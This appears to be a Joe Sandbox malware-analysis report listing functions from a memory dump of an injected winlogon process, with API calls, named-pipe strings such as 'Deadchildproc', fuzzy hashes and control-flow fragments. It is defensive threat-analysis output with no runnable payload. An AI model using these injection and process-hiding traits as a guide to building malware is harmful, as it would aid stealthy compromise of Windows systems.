225dc642f6f-225dc642f72 464->467 466->467 467->455 469 225dc642f74-225dc642f8d call 225dc6489d0 467->469 469->455
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProclstrlen
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 3607816002-3850299575
                                                        • Opcode ID: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction ID: 076814e57d21d2f3b3b410e77ef8730c28811e2173efb051d51587c31ad11a7d
                                                        • Opcode Fuzzy Hash: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction Fuzzy Hash: 50A1D33A21CFA1A2EB5ACFD9D4087A977A5F744B86F648056DE4A53B98DF34CC81C340
                                                        Function 00000225DC64104C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100memoryregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 471 225dc64104c-225dc6410b9 RegQueryInfoKeyW 472 225dc6411b7-225dc6411d2 471->472 473 225dc6410bf-225dc6410c9 471->473 473->472 474 225dc6410cf-225dc64111f RegEnumValueW 473->474 475 225dc641125-225dc64112a 474->475 476 225dc6411a7-225dc6411b1 474->476 475->476 477 225dc64112c-225dc641137 475->477 476->472 476->474 478 225dc641149-225dc64114e 477->478 479 225dc641139 477->479 481 225dc64119d-225dc6411a5 478->481 482 225dc641150-225dc64119b GetProcessHeap HeapAlloc GetProcessHeap HeapFree 478->482 480 225dc64113d-225dc641141 479->480 480->476 483 225dc641143-225dc641147 480->483 481->476 482->481 483->478 483->480
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction ID: 10060b41cb260af303b6ab6ddc9c0c8c5baff40587f29c1b63fca46e6a133ab5
                                                        • Opcode Fuzzy Hash: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction Fuzzy Hash: 21418037218F90D6E760CFA6E44839E77A1F388B89F54C129DA8A47B58DF38C549CB00
                                                        Function 00000225DC642344 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                        • String ID: \\.\pipe\Deadchildproc
                                                        • API String ID: 166002920-2259481039
                                                        • Opcode ID: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction ID: 92c08f6cc4004cb3f8b5e1b06263060720a831a650563b72dd941ce804ecb253
                                                        • Opcode Fuzzy Hash: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction Fuzzy Hash: 00114C3A628F5093E7108F69F44875A7761F389FD6F608325EA5A06AA8CF3CC548CB00
                                                        Function 00000225DC647930 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: e087d9ff1dacb74b7fa59f56ad70c442499e53cc6abe087a9cef841b2c5c687b
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 1081052D61CF72B6FB50ABED944D3993290AB45B82F14C5A5EA07837D6DB38C946CB00
                                                        Function 00000225DC649930 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,?,00000225DC649AEF,?,?,?,00000225DC6498B4,?,?,?,?,00000225DC6494A5), ref: 00000225DC6499B5
                                                        • GetLastError.KERNEL32(?,?,?,00000225DC649AEF,?,?,?,00000225DC6498B4,?,?,?,?,00000225DC6494A5), ref: 00000225DC6499C3
                                                        • LoadLibraryExW.KERNEL32(?,?,?,00000225DC649AEF,?,?,?,00000225DC6498B4,?,?,?,?,00000225DC6494A5), ref: 00000225DC6499ED
                                                        • FreeLibrary.KERNEL32(?,?,?,00000225DC649AEF,?,?,?,00000225DC6498B4,?,?,?,?,00000225DC6494A5), ref: 00000225DC649A33
                                                        • GetProcAddress.KERNEL32(?,?,?,00000225DC649AEF,?,?,?,00000225DC6498B4,?,?,?,?,00000225DC6494A5), ref: 00000225DC649A3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction ID: 24c979095fe9684387ee1b36362df099c9b39658b339583492920f750c380cbb
                                                        • Opcode Fuzzy Hash: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction Fuzzy Hash: 3931E53935EF60B0EE25EB8AA4087997398F744F66F198524DD2E07798DF38C486C300
                                                        Function 00000225DC651CBC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction ID: 5be9f3384d91eae15bd275903a3f580668a63c88c2dfc0f2a84967b766097804
                                                        • Opcode Fuzzy Hash: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction Fuzzy Hash: 70118236320F6096E7509B9AE84871972A0F788FE6F648225EE5D87794DF78C844C740
                                                        Function 00000225DC6431C0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: Dead
                                                        • API String ID: 756756679-1293411866
                                                        • Opcode ID: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction ID: b484f878597e3c1c40b0e3d2b5235eaf3506be0ad65e160053fa1907a731befa
                                                        • Opcode Fuzzy Hash: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction Fuzzy Hash: D331C02971DF65A2EA21DFEAA44836A73A0FB54F81F04C5309F8A07B54EF38C4A5C700
                                                        Function 00000225DC641934 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction ID: ba70d0768b3d9f561e044f18bf1f68bc2228eff5c97a5342605f90c4b2ec84b1
                                                        • Opcode Fuzzy Hash: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction Fuzzy Hash: F1016D39318F50A2EB10DB9AA85835963A1F788FC1F588534DE4E43758DF3CC585C740
                                                        Function 00000225DC643B00 Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction ID: c92eea84b00c9f903c707425f6f7cf6861390332b5c52ba7c555f9c9e54a20de
                                                        • Opcode Fuzzy Hash: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction Fuzzy Hash: 9F111729325F60A6EB259FA9E80C71A73A0AB58F46F248934C94D47764EF3DC548C700
                                                        Function 00000225DC6419D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction ID: fbbe23e74c16a92c052ec9dd558afad9badb573f34104f68d1e6396a38e464ad
                                                        • Opcode Fuzzy Hash: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction Fuzzy Hash: E9F04466318EA1A2E7208F69F89C3596760F744F89F94C030DA4946954DF7CC689C700
                                                        Function 00000225DC64330C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction ID: c4f516db2d58fdcf09ade6254635e81a5d9be160786ec31a530a94dc5a945ec3
                                                        • Opcode Fuzzy Hash: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction Fuzzy Hash: 54F08228318FA4A2EB108B9BB9081296621AB48FD2F18C531DE5A07B68CE3CC481C700
                                                        Function 00000225DC64A258 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction ID: 5c98f814b2717666e63fde822be8a9d320cb222d300e0f8fa89a857e9905caf9
                                                        • Opcode Fuzzy Hash: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction Fuzzy Hash: BAF08269339E50F1FF454FE8E88C3693360EB44F42F689869A50B45565CF38C488D710
                                                        Function 00000225DC650980 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00000225DC6509C2
                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000225DC65093F,?,?,?,00000225DC64E263), ref: 00000225DC650A80
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000225DC65093F,?,?,?,00000225DC64E263), ref: 00000225DC650B0A
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 2210144848-0
                                                        • Opcode ID: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction ID: 0f0869d84fd53ab6ea288093c665d748a95b5168c1234e854c3338e1b2f4001a
                                                        • Opcode Fuzzy Hash: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction Fuzzy Hash: C981D13AA24E70B9FB509FEDC8983AD27A0F744B9AF64C116DE0A5379ADB35C441C310
                                                        Function 00000225DC645B30 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 902aea7c29ad1d985186d30b6172ed8f126ccee6087c2613379ee29d3f5c645a
                                                        • Instruction ID: 6a0379e32459e306e126bed0441ef87126868a67170dd25357be7999984931ed
                                                        • Opcode Fuzzy Hash: 902aea7c29ad1d985186d30b6172ed8f126ccee6087c2613379ee29d3f5c645a
                                                        • Instruction Fuzzy Hash: 1661DC3A51DF94D6E760DB99E45831A77E0F388B45F109156EA8E87BA8EB7CC440CF04
                                                        Function 00000225DC6213D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000003.1759673624.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_3_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 718e6fdeed9a9adea99c63c7ba1f7eed387718c4396f80e4f9f43301a54de90c
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 8011252EA0CE7131F76812ECE45E3A990506F94777F18C224EA7F1B7E69A388C41C200
                                                        Function 00000225DC651FD8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 5220a858afc79e42da2a67563d9900ef8f3c475e5090a1d32d5d42a008362e73
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 4111A92EB71E3126F76B1EECD49E36D53416B54376F78C624AE760A3D6CA3888C1C100
                                                        Function 00000225DC643558 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2949516333.00000225DC65F000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2950402978.00000225DC665000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID: pid_
                                                        • API String ID: 517849248-4147670505
                                                        • Opcode ID: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction ID: c22a7db00d253f58136d9d1775b3b373fcc1f728726c29ad747a4587487ee6a6
                                                        • Opcode Fuzzy Hash: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction Fuzzy Hash: D411811931CF6571EB10DBA9E80935A73A1F784B92F508071DE5AC3B95EF39C905C740
                                                        Function 00000225DC6414A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.2947029260.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        • Associated: 0000000B.00000002.2946249694.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2947951309.00000225DC653000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.2948718553.00000225DC65D000.00000004.00000001.00020000.00000000.sdmpDownload File
